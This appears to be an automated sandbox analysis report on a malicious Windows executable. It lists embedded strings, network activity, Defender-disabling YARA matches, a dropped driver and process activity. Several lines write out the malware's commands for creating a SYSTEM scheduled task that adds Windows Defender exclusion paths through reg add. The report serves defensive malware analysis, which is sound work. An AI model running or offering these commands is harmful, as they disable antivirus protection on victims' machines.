Source: 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif)
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif5
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif;
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifA
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifJ
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifU
Source: 13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/c.gif
Source: 13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/d.gif
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDQsInVyaSI6ImJwMjpjbGljayIsImJ1b
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://psychhub.com/COVID-19/COVID-19-individuals/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://suicidepreventionlifeline.org/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://support.apple.com/en-us/HT204172)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.ada.gov/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.anthem.com/coronavirus/individual-and-family/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/about/prevention-treatment.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/cases-updates/summary.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/community/critical-workers/implementing-safety-practices.h
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/community/general-business-faq.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/community/large-events/index.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/community/organizations/cleaning-disinfection.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/community/schools-childcare/guidance-for-schools.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/living-in-close-quarters.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/share-facts.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/shared-housing/index.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/using-transportation.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/faq.html#COVID-19-and-Animals)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/hcp/disposition-in-home-patients.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/hcp/guidance-prevent-spread.html#precautions)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/if-you-are-sick/care-for-someone.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/if-you-are-sick/end-home-isolation.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/if-you-are-sick/end-home-isolation.html?CDC_AA_refVal=http
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/if-you-are-sick/steps-when-sick.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/need-extra-precautions/people-at-higher-risk.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/php/public-health-recommendations.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/cleaning-disinfection.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/cloth-face-cover.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/how-covid-spreads.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/prevention.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/social-distancing.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/when-its-safe.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/symptoms-testing/symptoms.html#seek-medical-attention)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/symptoms-testing/symptoms.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/coronavirus/2019-ncov/travelers/after-travel-precautions.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/handwashing/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/handwashing/when-how-handwashing.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/niosh/emres/2019_ncov.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/niosh/topics/hierarchy/default.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cdc.gov/tobacco/campaign/tips/diseases/depression-anxiety.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.cisa.gov/publication/guidance-essential-critical-infrastructure-workforce)
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.eeoc.gov/wysk/what-you-should-know-about-covid-19-and-ada-rehabilitation-act-and-other-e
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.epa.gov/pesticide-registration/list-n-disinfectants-use-against-sars-cov-2)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.nami.org/Home)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.osha.gov/Publications/OSHA3990.pdf)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.osha.gov/SLTC/covid-19/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.osha.gov/laws-regs/oshact/section5-duties)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.osha.gov/shpguidelines/hazard-Identification.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.samhsa.gov/find-help/disaster-distress-helpline)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.thehotline.org/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://www.who.int/mental_health/evidence/burn-out/en/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://wwwn.cdc.gov/dcs/ContactUs/Form)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 47.101.28.195:443 -> 192.168.2.6:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49993 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.4mPVjj.exe.27e0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 6.2.4mPVjj.exe.2830000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_0000000140006C95 NtAllocateVirtualMemory,

5_2_0000000140006C95

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

5_2_0000000140001520

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_000000014000C3F0	5_2_000000014000C3F0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_000000014000CC00	5_2_000000014000CC00
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_0000000140001A30	5_2_0000000140001A30
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_000000014000C2A0	5_2_000000014000C2A0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00000001400022C0	5_2_00000001400022C0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00000001400110F0	5_2_00000001400110F0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_0000000140010CF0	5_2_0000000140010CF0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_0000000140009300	5_2_0000000140009300
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_000000014000BB70	5_2_000000014000BB70
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_0000000140003F80	5_2_0000000140003F80
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00000001400103D0	5_2_00000001400103D0
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00007FFDAC12A1B8	5_2_00007FFDAC12A1B8
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 5_2_00007FFDAC130248	5_2_00007FFDAC130248
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 6_2_0294F828	6_2_0294F828
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 6_2_0286C998	6_2_0286C998
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 6_2_00602925	6_2_00602925

Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 13478674376-78423498.01.exe
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 13478674376-78423498.01.exe
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 13478674376-78423498.01.exe
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 13478674376-78423498.01.exe
Source: 13478674376-78423498.01.exe, 00000000.00000000.2124602764.000000014002F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBootstrapPackagedGame-Win64-Shipping.exeD vs 13478674376-78423498.01.exe
Source: 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 13478674376-78423498.01.exe
Source: 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 13478674376-78423498.01.exe
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 13478674376-78423498.01.exe
Source: 13478674376-78423498.01.exe	Binary or memory string: OriginalFilenameBootstrapPackagedGame-Win64-Shipping.exeD vs 13478674376-78423498.01.exe
Source: 13478674376-78423498.01.exe	Binary or memory string: OriginalFilenameD3DX9D.dll` vs 13478674376-78423498.01.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Source: 5.2.4mPVjj.exe.27e0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 6.2.4mPVjj.exe.2830000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.evad.winEXE@55/17@2/2

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,

5_2_0000000140003F80

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,

5_2_0000000140001430

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 6_2_028318A0 CreateToolhelp32Snapshot,Process32First,

6_2_028318A0

Source: C:\Users\user\Documents\4mPVjj.exe

5_2_0000000140001520

Source: C:\Users\user\Documents\4mPVjj.exe

5_2_0000000140001520

Source: C:\Users\user\Documents\4mPVjj.exe

File created: C:\Program Files (x86)\9eAesx

Jump to behavior

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3868:120:WilError_03
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Users\user\Documents\4mPVjj.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2220:120:WilError_03

Source: 13478674376-78423498.01.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\4mPVjj.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 13478674376-78423498.01.exe

Virustotal: Detection: 12%

Source: 13478674376-78423498.01.exe	String found in binary or memory: <</Subtype/Link/Rect[ 347.81 291.15 542.25 307.02] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(http://education.ohio.gov/getattachment/Topics/Ohio-s-Graduation-Requirements/News/Two-additional-graduation-options-available-fo-1/GradReq20.pdf.aspx?lang=en-US) >>/StructParent 25>>
Source: 13478674376-78423498.01.exe	String found in binary or memory: <</Subtype/Link/Rect[ 69.75 275.28 147.74 291.15] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(http://education.ohio.gov/getattachment/Topics/Ohio-s-Graduation-Requirements/News/Two-additional-graduation-options-available-fo-1/GradReq20.pdf.aspx?lang=en-US) >>/StructParent 26>>
Source: 13478674376-78423498.01.exe	String found in binary or memory: <</Subtype/Link/Rect[ 105.75 143.98 235.56 160.71] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(https://www.samhsa.gov/find-help/disaster-distress-helpline) >>/StructParent 138>>
Source: 13478674376-78423498.01.exe	String found in binary or memory: /LOADINF="filename"
Source: 13478674376-78423498.01.exe	String found in binary or memory: seo-by-rank-math-pro/includes/admin/class-admin-helper.php
Source: 13478674376-78423498.01.exe	String found in binary or memory: fg:seo-by-rank-math-pro/includes/admin/class-admin-helper.php
Source: 13478674376-78423498.01.exe	String found in binary or memory: seo-by-rank-math-pro/includes/class-installer.php
Source: 13478674376-78423498.01.exe	String found in binary or memory: 1seo-by-rank-math-pro/includes/class-installer.php
Source: 13478674376-78423498.01.exe	String found in binary or memory: seo-by-rank-math-pro/includes/modules/local-seo/shortcodes/class-address.php
Source: 13478674376-78423498.01.exe	String found in binary or memory: Lseo-by-rank-math-pro/includes/modules/local-seo/shortcodes/class-address.php

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

File read: C:\Users\user\Desktop\13478674376-78423498.01.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\13478674376-78423498.01.exe "C:\Users\user\Desktop\13478674376-78423498.01.exe"
Source: unknown	Process created: C:\Users\user\Documents\4mPVjj.exe C:\Users\user\Documents\4mPVjj.exe
Source: unknown	Process created: C:\Users\user\Documents\4mPVjj.exe C:\Users\user\Documents\4mPVjj.exe
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
